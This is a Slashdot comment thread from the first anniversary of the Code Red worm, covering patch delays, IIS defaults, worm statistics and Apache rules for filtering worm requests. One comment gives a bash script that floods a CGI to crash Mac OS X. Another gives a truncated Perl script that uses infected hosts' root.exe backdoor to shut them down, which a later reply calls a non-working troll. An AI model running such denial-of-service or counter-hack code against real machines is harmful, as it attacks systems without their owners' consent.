Happy Birthday Code Red 373
totallygeek writes: "One year ago today (July 19, 2001), more than 359,000 computers were infected with the Code Red worm in less than 14 hours. At the peak of infection, more than 2,000 new machines were infected each minute. Servers running Internet Information Services from Microsoft were propagating this worm across the Internet faster than anything has up to then or since. For the first time, systems running the Apache web server were getting requests for a document called "default.ida". Here we are a year later, and my web log shows an average of forty-two requests per day for default.ida over the last five days. To really appreciate the spread of this program, look at this animated image."
IIS is sorta like an STD (Score:4, Funny)
Re:IIS is sorta like an STD (Score:2, Insightful)
Re:IIS is sorta like an STD (Score:4, Insightful)
Yeah, that's fine and dandy for those who don't need the IDA, et all mappings; but what of those people who DO use them?! You know, a lot of those corporate servers that were hacked had those script mappings set for a reason, i.e. they were using them.
That's great that you knew better than to keep the default script mappings, but what about people who needed them?? It would have been a lot nicer if Microsoft had written a secure server in the first place instead. Even the most vigilant sysadmin would still get infected running IIS if he needed to use the IDQ & IDA mappings. In short, don't blame the sysadmin, because it's not always their fault.
Happy Birthday to me.... (Score:3, Funny)
1) DIVX's of Hackers or The Net.
2) Natalie Portman... Enough said.
3) Port me to more platforms.
and finally.... a 2nd chance.
And how fitting... (Score:5, Funny)
Re:And how fitting... (Score:5, Funny)
That is me, and yeah *OUCH*, I am feeling it.
Click Here? (Score:5, Funny)
That's the first time I've seen someone getting smashed by the /. effect, and coming back asking for more!
Re:And how fitting... (Score:2, Interesting)
Re:And how fitting... (Score:2)
Alternate URL for animated image (Score:3, Informative)
I wouldn't worry about it. (Score:5, Funny)
Sorry. (Score:5, Interesting)
Folks will notice though that the fixed version of Code Red I (CodeRed.B) is still going. Picked up a couple of hits today.
Ya think? (Score:4, Interesting)
This was not an exhaustive search, nor a statistically significant sample group, and dynamic IP allocation muddled the results a bit, but it was enough to make me wonder. How many of the 'code red attacks' these days are really script kitties with unix boxes? My guess is they account for most of them.
Has anyone looked into this for more than the 15-20 minutes I put into it?
Re:Ya think? (Score:3, Informative)
The results are:
5 down
14 reported as a Windows variant by nmap
2 unknown
1 Linux
I looked into the 2 unknown results a bit more. Both respond on port 80 with an IIS banner and ASPSESSIONID cookies. One of them has a Serv-U banner for ftp as well.
Interestingly, one of them (the one w/o Serv-U) is a
The Linux result answers on port 443 as a vulnerable version of Apache on someone's firewall in Italy. This is likely being used as a launchpad for attacks.
So, from what I gather, the bulk of the ongoing Code Red attacks are from Windows machines with extremely negligent administrators.
I'm still getting hit as well (Score:2)
servers on the avarage of every 5min. It would seem
that after all of this time people would clean up their servers. What really bothers me is some of the machines hitting me are commercial web sits verses the home machines.
What about Morris? (Score:5, Insightful)
Granted, the 'Net was a lot smaller, but what about the Morris worm?
Re:What about Morris? (Score:2)
*sob*
Re:What about Morris? (Score:2, Interesting)
All About Morris [software.com.pl]
Wikipedia [wikipedia.com]
It seems that a college kid [discovery.com] wrote a small prgram to propagate itself to as many computers as it could, and try to run in the background unnoticed. But due to a bug(s) it copied itself manytimes over and ran multiple times on teh same machine, causeing to slow to a point of being unusable.
It infected 6,000 VAX machines in November of 1988.
Gotta love Google [google.com]
Re:What about Morris? (Score:2, Insightful)
The Morris worm was slowed down by the speed of the Internet... we had a 64kbps connection to ICL. We managed to pull our link to the next before we got affected. It was really quite exciting at the time, following the Usenet links as people pulled the Morris worm apart and analysed it byte by byte.
In the end we were probably affected for around 3 days. We first realised there was a problem as Usenet dried up... we used to take all newsgroups with a feed of around 1000 posts per day! This slowed to a trickle during the 'attack'.
Things got back to normal again as you really had to have people who knew what they were doing to get Unix and Vax systems on the 'net back then. Also there were nowhere near as many wankers online, even as a % of the total population. We were there in a spirit of cooperation and discovery. Happy days.
David
Well, at least it was good pizza that night... (Score:5, Interesting)
Seriously, though, it also taught the company I work for a serious lesson about staying on top of this kind of stuff. We had just finished a 2 month project to secure our web servers, but we were still bound by our traditional change management processes - 7 days notification for an outage, and testing of all changes documented and submitted for approval in advance. At the time Code Red hit, I had sent a note saying "we've really got to get this hotfix applied", but we were bound by the process, and we got burned.
Needless to say, when an urgent hotfix comes out now, it takes almost no convincing to get it applied ASAP. If it breaks a web app or two, well, that's the risk we take. We'd rather look for signoff from the business to unapply a hotfix that breaks something, than spend a few days trying to secure the approval beforehand. It's a lot cheaper in the long run to troubleshoot the effects of a hotfix that has unintended side effects than it is to watch your entire web farm get demolished by a worm.
Yes, we run IIS, and I suppose you could harp about how this could all be avoided by running Apache, but the point is that without a policy, strategy, and process for rapidly deploying defenses against net-born attacks, no system is invulnerable.
Re:Well, at least it was good pizza that night... (Score:2)
Well corporate policy or not it's pretty freakin' irresponsible for not having a security patch that was out more than 25 days before Code Red even hit. (Not to mention anyone who followed Microsoft's best practices for IIS wouldn't have been hit anyway).
Apache, IIS, MSSQL, PHP, BIND, OpenSSH--it doesn't matter... they all gotta be patched.
Re:Well, at least it was good pizza that night... (Score:2, Interesting)
I sometimes use VNC - but restrict it through a firewall so only a specific IP(my work PC) can communicate with it, in specific timeframes. It also does not run as default - I use SSH to start it, also Ip filtered and time restricted. Which I think is all possible in windows as well(have not tried that). Oh - And it does not run as ROOT. I restrict root to console only.
You see the other problem is that XP and 2k may well be running security vulnerable services without the user knowing -as default setup. Which is why XP is so bad as a joe user OS- it has more security holes than my socks...Unless you are competant to configure and patch it - and lets face it even many trained MIS staff miss them - let alone Joe Shmoe Wordprocessor who bought an XP box from PC world.
If a hotfix breaks an app, kick the developer. (Score:4, Interesting)
When your developers are not that educated however, perhaps they use dirty tricks which will break when a hotfix is applied (allthough I doubt it, hotfixes mostly overwrite existing files without updating CLS_ID's etc, because these stay the same) and the app will die after the hotfix is applied: one reason to kick them out the door for some real professionals.
Re:If a hotfix breaks an app, kick the developer. (Score:3, Insightful)
Re:Well, at least it was good pizza that night... (Score:2)
It's not about how frequently exploits and/or fixes arise for the particular services you run - it's all about how quickly and effectively you can deploy defensive measures, and that ultimately comes down to the human element.
Re:Well, at least it was good pizza that night... (Score:2)
It's not about how many people are shooting at you, it's all about how quickly you can duck.
mirrors of code red growth gifs (Score:2, Informative)
Re: mirrors of code red growth gifs (Score:2, Funny)
> http://images.google.com/images?hl=en&lr=&ie=UTF-8 &oe=UTF-8&q=CodeRed.gif&btnG=Google+Search
.gif is really getting around. Are we sure it isn't a virus, too?
Wow, that
Animation Mirror Sites (Score:5, Informative)
UK Mirror [jump.org.uk]
UK FTP [ucl.ac.uk]
AU Mirror [planetmirror.com]
Flipbook animation (207k
Quicktime animation of growth by geographic breakdown [caida.org] (200K
original www.caida.org gif animation [caida.org]
Re:Animation Mirror Sites (Score:2)
Happy Birthday? (Score:4, Insightful)
Maybe we should celebrate the resiliency of the Net. The fact that while attacks on systems continue to come daily, and at a seemingly increasing rate, everything still works most of the time.
--knowledge, not information, is power
Re:Happy Birthday? (Score:5, Funny)
Re:Happy Birthday? (Score:3, Insightful)
Here's some help (Score:2)
<sarcasm> </sarcasm>
Does that help?
IRC quotefile entry (Score:5, Funny)
<skreech> I'm gonna miss code red when its gone, my webpage has never gotten this many hits before
Lots of infected hosts still out there (Score:4, Interesting)
Re:Lots of infected hosts still out there (Score:2)
# echo "`grep cmd\.exe access_log | wc -l` / `wc -l access_log | sed 's/[^0-9]//g'`" | bc -l
All that wasted bandwidth...
Looking at my records (Score:2, Insightful)
Microsoft Security Bulliten MS01-033
June 18, 2001 14:36:53
q300972_w2k_sp3_x86_en.exe
When did Code Red hit? Did I bother to notice? Did I bother to record? No. It didn't affect me much.
Re:Looking at my records (Score:3, Insightful)
A full month.
And, being a competent admin, his boxen weren't hit.
Re:Looking at my records (Score:2, Insightful)
Most boxes affected weren't company systems (Score:2)
Most IIS admins who are responsible for webservers who run company websites did patch IIS long before the worm started or better: did like MS told them to do: disable all extensions not used on the box, like htr and ida. (Oh, and removed the examples)
Ok, some company-used webservers were exploited, but this number is not a majority by far.
Re:Looking at my records (Score:5, Informative)
6/18: MS sends MS01-33: Unchecked Buffer in Index Server ISAPI Extension Could Enable Web Server Compromise - Run code of attacker's choice.
7/18: CodeRed hits, those of us who installed the MS01-33 patch laugh.
7/30: MS et al send out another alert uring people to read MS01-33 and install the patch.
times out (Score:5, Insightful)
Is it slashdotted or is that the demonstration?
;)
My school district's (Score:5, Informative)
I sent them an email - almost a year ago in fact. They just brushed me off and gave a rather pathetic excuse ("the box is too slow to run Norton").
You can read the e-mail here [webhop.net].
Of course, these are the same people who run a trouble ticket server on the district wide WAN that any old joe at school can access and see where the security issues are.
Re:My school district's (Score:3, Informative)
Another rampant problem with IIS that is still VERY VERY widespread is older Servers IIS 4.0 mainly, and some 5.0, that have FrontPage extensions installed, have botched NTFS permissions on the "Front Page Web".
I don't know if anyone has noticed this, but if you have Microsoft Front Page installed on your browser, a little button shows up on your Internet Explorer toolbar, the default is usually the Word Icon, as in edit this page with Microsoft Word, but if you have Front Page installed on your computer, you can select Edit with FrontPage, and FrontPage will attempt to communicate with the Web Server for remote authoring, now if this web server is an IIS server, and has Front Page Extensions installed for remote authoring, and the NTFS permissions have not been set correctly, it will give you, the IUSR_ (Internet User) account FULL Priveleges to change the "Front Page web".
As of now, I know 3 high profile companies who have this issue with their sites WIDE OPEN. Anyone can waltz in and alter their website, using the IUSR_ account. I would like to let them but how do I know they are not going to accuse me of something I didn't do, and just happened to stumble on.
Oh well.
Post the URLs (Score:5, Funny)
I'm sending this to local newspapers. (Score:2)
I don't. (Score:2)
I sent it to TV instead: click2houston.com
I bcc'd you on the email.
It's not code red? (Score:2)
Which virus do they have?
I wouldn't worry about the FBI, etc.
It's not like it's a unique infection that no one has ever seen before.
Re:My school district's (Score:2)
Re:My school district's (Score:2)
You'd be amazed [netcraft.com] at the places [netcraft.com]still running old [netcraft.com] apache [netcraft.com] versions despite the ominous [lwn.net] warnings [slashdot.org]!
(Yes, I found the lwn [lwn.net] link very ironic too, but not as funny as this [netcraft.com])
Re:My school district's (Score:2, Informative)
Re:My school district's (Score:2)
I remember microsoft.com had a quote from a guy who was the head IT person over in FBISD on how MS software really made things wonderful for the students and staff members. The guy's name was something Pike. I don't think he works here anymore. If I find the page, I'll post the URL.
The guy's name (in the email) is Doug Wormhoudt. I just removed the e-mail addys as a temporary precaution.
FBISD is a 100% NT shop, though I know they have an AS/400 for student records and someone "in the know" tells me that they have a linux machine sitting on the network.
For the record, I don't have any interest in trying to break into these systems. (Since I know someone will try to accuse me of).
im gonna sing (Score:2, Funny)
Now blow out the flaming servers, and make a wish.
Argh (Score:3, Interesting)
At its peak, Qwest had a 5 hour hold time for people who's cisco was taken down by the vuln.
Incidently, the fix was killed more routers.
Re:Argh (Score:3, Interesting)
A year later, no service pack 3 for Win2K (Score:2, Insightful)
Corporate America mostly runs Windows 2000. That's the system that needs security and reliability most. And where's Microsoft?
Re:A year later, no service pack 3 for Win2K (Score:2)
I think you better check your Windows Update. I think you'll have 20 or so security fixes to install.
Better luck bashing next time!
Dave
apache attacklog analyser? (Score:2, Interesting)
That'd be cool
go to the source for the image? (Score:2)
http://www.jump.org.uk/caida_code_red_animations/
go there...
Of course, that is a 4.1 MB GIF file.
What pisses me off (Score:4, Informative)
Kind of killed off community effort right there. >;(
Re:What pisses me off (Score:3, Interesting)
The author made the program available on his website, so that anyone not running a webserver could run CRV themselves. I know the author also got a lot of thank you emails from infected users who thought they weren't vulnerable because of misinformation that was going around about the worm.
As to your FBI story, I think the problem there was that the worm-patching-another-worm was making changes to the system without permission of the admin. But it makes me wonder how the FBI may have reacted to the CRV program. Given that the FBI has better educated themselves on computer hacking issues (especially since the witchhunts following the AT&T outage in the early 1990s), my guess is that they saw it as no biggie because it made no permanent changes to the infected machine.
76 Code Red hits in 2 months (Score:2, Insightful)
Total/Unique
Nimda hits: 6213/134
CodeRed hits: 76/76
Damn annoying, though.
Re:76 Code Red hits in 2 months (Score:3, Interesting)
Nimda - 319242 attacks
CodeRed 2 - 15488 attacks
CodeRed - 359 attacks
All from 5777 unique hosts.
Something strangely morbid about this birthday (Score:2)
This... is my bro.
CRAZY EARL the sysadmin lifts a dustcover to reveal a toasted server
This is his party. He's the guest of honor. Today... is his birthday.
Email Mother calls out from down the hall: "Happy Birthday, Code Red."
I will never forget this day. The day I came to IIS city and fought one million Code Red worms. I love the little Commie bastards, I really do. These enemy worms are as persistent as thick-headed CIOs.
These are great days we're living, bros! We are jolly caffeinated giants walking the earth, with Bawlz [thinkgeek.com]. These worms we wasted here today, contain the finest code we will ever see. After we start working with real servers again we're gonna miss not having any worms around worth killing!
(obligatory reference [e-reference.ru] for those who've never seen Full Metal Jacket)
42 (Score:2, Funny)
That is indeed interesting, a short time ago when discussing [daimi.au.dk] Windows security in a danish newsgroup, I counted the entries in my log. I also had an average of forty-two requests per day.
This couldn't be a coincidence, could it?
Re:42 (Score:2)
Well of course, 42 is the Answer [bbc.co.uk].
The question, alas, is more complex. And will need Slartibardfast's [bbc.co.uk] fjord designing skills. Or Arthur's [bbc.co.uk] brain.
Evil plan (please don't implement) (Score:5, Funny)
One thing we discussed doing was getting a copy, disassembling it, and building a version that would install FreeBSD with Apache with Front Page Extensions and the Active Server Pages module over top of the Windows installation, with all of the web site content left more or less intact.
We figured that it would be pretty cool if we could make it so that people would not notice that their server had been "competitively upgraded" until the next scheduled reboot/update.
We thought that it would be even more likely to go a long time if we captured the console screen of the running server, and used it as the boot "splash screen" for the replacement OS...
Of course, as I said, doing this would be Evil, so we only discussed the possibility.
-- Terry
Haha (Score:3, Funny)
Do I get a cookie?
Mirror (Score:2, Informative)
Here's a mirror of the image.
http://razor.hemmet.chalmers.se/CodeRedSpreading.g if [chalmers.se]
509 (Score:3, Interesting)
You should have seen it last year, one day we were receiving so many requests for non-existant files that out server was crawling, because our not found page was generated by some scripts. I simply wrote a Perl handler to handle it(roughly 60 secs) and that took care of it.
Quite humorous it was. And that we still get thousands of hits from infected machines is hilarious.
Heh, Internet worms... fun stuff.
The 1% Patch Statistic (Score:4, Informative)
Additionally, the Win2K/NT server guys are afraid to install security patches since they never are really how much of their server is going to break [com.com]. Often times, Admins will patch the servers which touch the Internet but not the Internal servers for fear of breaking them. With Code Red, this was quite humorous because the outer servers were patched as soon as the Code Red patch was available, thinking this action would defend the realm against Code Red, but they forgot about the laptop users which brought Code Red in the back door via the local LAN.
But not to worry folks, once we get Palladium hardware in all our servers, this will not happen again right? In fact we won't even have to patch anymore, since everything will be secure and, only secure applications will be allowed to run.
Oh, wait, wouldn't IIS pass the palladium trusted application test?
Why yes it would...... and Code Red would join the list of "Trusted Secure Applications".!
Sorry, I have to smack Palladium everytime I get a chance.
Re:Logs Clogged (Score:5, Informative)
One thing to do is have a cron job to scan your logs and if it sees any of the above, add the ip to an iptables blocklist. At least that way, you only get hit once by it from each infected host.
Or you could use apache's rewrite rules to forward all attacks to www.micrsoft.com, but I wouldn't recommend that.
dave
Re:Logs Clogged (Score:2)
I doubt the worm is going to bother to follow redirect requests.
Re:Logs Clogged (Score:3, Interesting)
Besides https://microsoft.com/ would chew up more cycles on their end....
All kidding aside, with a redirection rule, the worm may not follow it, but at least it cleans up the logs a little. Plus, Apache's default error page and it's default redirect page are about the same size (for the bandwidth conscious).
Just add the following to your httpd.conf at the root level (so they are inherited by all of your <VirtualHost>s as well):
RedirectMatch
RedirectMatch
RedirectMatch
RedirectMatch
For those of you who think these are a bit too general (they match quite a few URLs), or if you have legitimate destinations which are matched by the above patterns, I'm sure they can be modified to suit your needs....
Re:Logs Clogged (Score:3, Informative)
When a legitimate bot such as google scans your system, it looks in robots.txt for find out where NOT to scan in case you have web pages you do not wish to be searchable.
Re:Logs Clogged (Score:2)
dave
Re:Logs Clogged (Score:2)
Heck, I'd be mildly surprised if Code Red even bothered looking at the response from the server... IIRC, it just dumps the code it wants to run in the HTTP request and lets the code take care of the rest. (On the other hand, nimda does check the status code to see if the server's vulnerable to any of the attacks it tries. If you return 404s, it gives up pretty quickly, but if you return 200, it tries to do a lot more).
Re:Logs Clogged (Score:5, Informative)
SetEnvIf Request_URI "^/default.ida" dontlog
ErrorLog logs/254-error_log
CustomLog logs/254-access_log combined env=!dontlog
check out SetEnvIf in apache docs, you can do even better than this.
Re:Logs Clogged (Score:2, Informative)
redirect /scripts http://www.stoptheviruscold.invalid /c http://www.stoptheviruscold.invalid /d http://www.stoptheviruscold.invalid /_mem_bin http://stoptheviruscold.invalid /_vti_bin http://stoptheviruscold.invalid /msadc http://stoptheviruscold.invalid /MSADC http://www.stoptheviruscold.invalid
redirect
redirect
redirect
redirect
redirect
redirect
RedirectMatch (.*)\cmd.exe$ http://stoptheviruscold.invalid$1
Re:Logs Clogged (Score:2, Informative)
Re:No mac web os9 or older servers EVER exploited (Score:2)
Re:No mac web os9 or older servers EVER exploited (Score:2)
#!/bin/bash
#
# CGI-McPanic: script to crash MacOS X with
# concurrent calls to a CGI-Script
#
# before use, do:
#
# chmod a+x
#
# then call
#
# bash
#
NUMPROC=32
i=0
while [ $i -le $NUMPROC ]
do
i=$[$i + 1]
ab -t 3600 http://localhost/cgi-bin/test-cgi &
done
Re:Interesting... (Score:4, Insightful)
Sounds an awful lot like the fault of the user to me...
Re:Interesting... (Score:3)
Did it occur to you that maybe you should connect the box to the Internet as the LAST STEP? - AFTER the server is configured and PATCHED?
You can get the service pack on another system and write it to CD so you don't need an ethernet connection to make the system current with patches.
Plug the ethernet cable into the server as the dead LAST step.
Re:Interesting... (Score:3, Insightful)
Perhaps that should be obvious to an experienced sysadmin, but most installers of Windows 2000 won't have a clue about such precautions. The intelligent thing for Microsoft to have done is not had IIS turned on by default. This is especially obvious when you consider how many of the Code Red hits you get come from people who obviously don't even use the IIS that's running on their box.
Since Microsoft is aiming their software at clueless users who can't be bothered to secure their machines, Microsoft needs to ensure that their software is secure out of the box.
Re:Interesting... (Score:3, Insightful)
Fifteen years ago we knew that Sun insisted on shipping SunOS with a "+" in
In the real world you have a checklist of things that must be done and things that must be changed before the box can put into production especially on the the big bad Internet. In our company, where the NT operations MCSE staff are not exactly the brightest thinkers, we have a standard Windows 2000 build document that has a security checklist and says to only install IIS if the box is going to be a web server. There ARE checkboxes in the custom install where you can deselect the install of IIS and other unneeded programs.
If you dare to draw a paycheck you SHOULD be a Professional. It's up to you to learn how a professional operates.
Re:Interesting... (Score:5, Funny)
Microsoft is right. The user is using Microsoft software.
Lamer Exterminator (Score:2)
Xix.
They are user's fault (Score:2)
Viva Unix! =)
Re:Interesting... (Score:4, Informative)
- Every coder makes programming errors (some more than others, true).
- Microsoft released a *working* patch a few months before the exploits started.
- A work around was also available.
- A properly installed & configured server was *not* vulnerable.
- A web server does not need to *establish* outbound HTTP connections through the firewall, only to accept and reply to them.
You kind of get an idea where they are coming from.PS. That last point is the crux, and denying webservers the ability to establish outbound HTTP connections would have stopped Code Red type exploits dead. If your network is properly configured, even if you are exploited, then the exploit should have a much harder time propagating and thus making you look like a complete incompetent. The *real* problem is that a *huge* proportion of sysadmins don't seem to understand the most basic of security principles, and that's not Microsoft's problem at all.
Re:All of this kvetching about bad sysadmins, and (Score:3, Insightful)
If you get shot by someone and suffer horrendous injuries, do you sue every bullet proof vest manufacturer, or gun manufacturer because they didn't base their business model around you? Or do you sue (or at least lock up) the one who pointed the gun at you and pull the trigger? Do you go around your neighborhood, testing each doorknob to see if the house is locked, then rob and burn down each house that isn't? Is it the homeowner's fault for not locking the door, or you for entering in the first place?
If you want to hold anyone responsible, try the guy/s who code viruses and worms... Anyone with sufficient pathological incentive to wreak havoc and trash a computer system (or, basically, anything else) will do so...
Responsibility goes two ways, on one hand, those who have known for a substantial period of time that there was a problem that needed addressing, and those who take advantage of that problem... The net makes this all more obvious, at least to those of us with a smidgen of common sense...
Re:All of this kvetching about bad sysadmins, and (Score:2)
Re:All of this kvetching about bad sysadmins, and (Score:2)
Believe it or not, a lot of people are trying just that, and frightenly having a fair amount of success.
The problem in the case of Code Red, and the worm of the week wreaking havoc with Microsoft products, is one of false representation, and perhaps outright fraud.
People keep getting told from Microsoft "Our servers are stable and secure, you don't need to don't need to worry." Then something happens, and Microsoft does nothing until someone has demonstrated in an amazingly public way that their stuff in indeed vunerable.
Once that happens they issue a fix. The fix usually seems to be some method of messing up the specific method used, so minor changes to the worm make it work again.
The Open Source world on the other hand is very quick to fix any bugs they know about and can that can be fixed. More than once some of the security groups were frustrated when Red Hat or some other Linux distro maker, after being informed of a problem, releasing not only the details but a fix long before they were ready.
Microsoft has actively tried to keep anyone from finding out through any legal means about any security problems with their products. The Linux community works hard to find and fix problems.
Microsoft products are a little like the Ford Pinto of the software world. The Pinto would blow up rather spectacularly if rear ended. Ford was sued and had to fix the problem.
Had Ford voulantarily recalled the Pinto earlier (and the evidence suggested that they knew of the problem before the first Pinto was ever sold), there would have been no casue to sue them. However they tried to cover up the problem, and repeatedly denied the existence of any problem.
Microsoft knows there are vast security holes in their products. They prefer to put them out and hope no one notices. When someone does notice, they deny there is a problem, and have pushed to get anyone who tries to find such problems arrested. They are, in effect, enganged in a cover up. This is what opens them up to being sued. There is rarely a good faith effort to fix any security hole before it becomes a problem.
Contrast that with the Linux world. There are occasionaly penetrations, but there is always an effort to find and fix such problems long before such things happen.
The other problem was that IIS and WPS are often installed and running without the person even knowing it. In fairness, most linux distros seem to install and set up Apache without permission too, but at least Apache has been pretty much immune to worms for the last few years. Should you hold everyone who installed win2k on a networked machine responsible because they failed to install security patches on a server they didn't even know they were running?
Microsoft acts very irresponsibly with their software, and there should be some accountability. I wouldn't sue them just over Code Red, but take the worm of the week hitting IIS, and the worm of the week hitting Outhouse, and Microsoft's complete indifference to fixing either, and we get a pattern of indifference which is prosecutable.
Re:Power of slick advertising (Score:3, Insightful)
If you think you can put ANY server up on a public network and not maintiain it--you WILL be in for a rude awakening one day.
Re:Power of slick advertising (Score:4, Insightful)
Of course - that's not to say it can't happen to Linux in the future. Some changes that would have to take place would include:
1) An increase in un-administered machines (which is possible as more Linux machines go in to service and are promptly forgotten about or appropriate support stuff aren't also put in place).
2) More distributions installing services by default without user knowledge (which most distros seem fairly resistant to doing - but not all).
3) Patches that become as devistating as the security threat they attempt to mitigate (I've yet to see this and would think that any organization that constantly produced dangerous patches / replacement packages would find their user base fleeing to another distribution).
Re:Power of slick advertising (Score:2)
Just a side note, if anyone ever came up with a virus that was as devastating to apache as code red was to IIS, I think Linux would be doomed.
What about the Apache vulnerability that was discoverd a couple of weeks ago? I would think there are still loads of people who haven't patched their servers (and even the patch does not give full protection. See the advisory [apache.org]).
Microsoft are addressing the issue of applying patches to products such as IIS with features that remind system admisitrators about new patches and automate the process of applying them.
I really think that open source systems such as Apache will need to have features like these if they are to compete strongly.
If Code Red taught us one thing, it was that the application of patches is as important as the patches themselves (MS released a patch that prevented Code red infection months before the outbreak)
Re:To Celebrate the party... (Score:2)
Re:I still have my fake default.ida (Score:2, Informative)
those items out, run it as a CGI script. Any
comments / suggestions? WARNING: I'm still learning perl... this could be (is?) ugly!
#!/usr/bin/perl
# This is a CGI script. Properly linked from your
# web server, it turns around and issues commands
# to a code red-infected server that is trying
# to kill your server. Make $YOURSERVER/default.ida run
# this CGI script, and watch the other server stop its
# IIS service and shut down windows.
use LWP::Simple;
my $incoming;
my $request;
print "HTTP/1.0 200 OK\n\nBeginning rooting of your code-red-infested box...\n";
print "This could look weird on your logs if you're not infected and just poking around.\n\n";
$request = sprintf("http://%s/scripts/root.exe?/c+iisreset+/
$incoming = get $request;
print "\n", $request, "\n\n", $incoming, "\n\n";
$request = sprintf("http://%s/scripts/root.exe?/c+rundll32.e
$incoming = get $request;
print "\n", $request, "\n\n", $incoming, "\n\n";
#Obligatory
print "YHBT. Have a nice day.\n\n";
Re:I still have my fake default.ida (Score:4, Insightful)
That stands for "You have been trolled".
The perl script is a troll, it won't work, I can't believe this got modded up.